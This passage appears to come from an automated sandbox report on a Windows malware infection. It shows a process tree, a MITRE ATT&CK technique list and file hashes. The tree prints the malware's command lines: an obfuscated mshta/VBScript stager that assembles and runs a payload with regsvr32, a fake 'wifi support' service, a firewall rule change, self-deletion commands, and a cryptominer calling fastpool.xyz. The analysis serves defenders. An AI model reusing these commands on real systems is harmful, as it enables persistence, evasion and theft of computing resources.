                                                                                                                                                                                                                                                                  PID:440
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:2676
                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4468
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4212
                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:1584
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:4900
                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:5472
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:3832
                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                              PID:4332
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:4720
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:4548
                                                                                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5784
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D5ED.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D5ED.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:5600
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D5ED.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\D5ED.exe
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:5520
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D5ED.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\D5ED.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:4460
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D5ED.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\D5ED.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:3984
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\5aee7f7d-6d45-4a45-903e-2c93e9eb40b3\build2.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\5aee7f7d-6d45-4a45-903e-2c93e9eb40b3\build2.exe"
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:4580
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\5aee7f7d-6d45-4a45-903e-2c93e9eb40b3\build2.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\5aee7f7d-6d45-4a45-903e-2c93e9eb40b3\build2.exe"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:5884
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\5aee7f7d-6d45-4a45-903e-2c93e9eb40b3\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:5812
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                              taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                              PID:4140
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                              PID:368
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DAA1.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\DAA1.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:5756
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jkmedckf\
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5300
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qlakpumk.exe" C:\Windows\SysWOW64\jkmedckf\
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:1192
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" create jkmedckf binPath= "C:\Windows\SysWOW64\jkmedckf\qlakpumk.exe /d\"C:\Users\Admin\AppData\Local\Temp\DAA1.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:5324
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" description jkmedckf "wifi internet conection"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:5732
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" start jkmedckf
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:6032
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                PID:4244
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:4648
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  PID:4604
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\ycfbnwtp.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\ycfbnwtp.exe" /d"C:\Users\Admin\AppData\Local\Temp\DAA1.exe"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:3992
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\dvemjwic.exe" C:\Windows\SysWOW64\jkmedckf\
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:1704
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" config jkmedckf binPath= "C:\Windows\SysWOW64\jkmedckf\dvemjwic.exe /d\"C:\Users\Admin\ycfbnwtp.exe\""
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:4588
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" start jkmedckf
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:4336
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:2164
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E0FB.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E0FB.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:440
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im E0FB.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E0FB.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:600
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                taskkill /im E0FB.exe /f
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                PID:1712
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                PID:5736
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ED7F.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\ED7F.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:4852
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\ED7F.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if """" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\ED7F.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              PID:4448
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\ED7F.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\ED7F.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:5200
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe
                                                                                                                                                                                                                                                                                                                                    sSD3PQMWaP.exe -PmLQymN~qiAE1Rr
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:4756
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if ""-PmLQymN~qiAE1Rr"" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:5484
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "-PmLQymN~qiAE1Rr" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                              PID:4608
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBsCRiPt: cLOse ( CrEAteObjECt ( "WscRipt.sHElL" ). rUN ( "CmD /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = ""MZ"" > 66WBQ~Nm.TVY & CoPY /y /B 66WBQ~Nm.TvY + Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S ", 0 , trUe ) )
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:4772
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = "MZ" > 66WBQ~Nm.TVY &CoPY /y /B 66WBQ~Nm.TvY+Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                PID:4716
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5412
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>66WBQ~Nm.TVY"
                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5072
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                      regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3256
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                  taskkill -Im "ED7F.exe" /f
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                  PID:4492
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\jkmedckf\dvemjwic.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\jkmedckf\dvemjwic.exe /d"C:\Users\Admin\ycfbnwtp.exe"
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:5192
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5352
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:1524

                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                                                                                New Service

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1050

                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1158

                                                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                New Service

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1050

                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                                                                                File Deletion

                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                T1107

                                                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                                                File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1222

                                                                                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                                                                                Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1158

                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                                                Impact

                                                                                                                                                                                                                                                                                                                                                Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                T1490

                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\libcurl.dll
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\libcurlpp.dll
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\libstdc++-6.dll
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\libwinpthread-1.dll
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_1.exe
                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                                                                                  SHA256

